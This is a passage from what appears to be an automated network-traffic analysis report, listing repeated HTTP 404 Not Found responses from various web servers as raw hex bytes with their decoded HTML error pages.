73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 07 Nov 2024 07:11:07 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:13 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 07:11:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:11:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 07:11:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 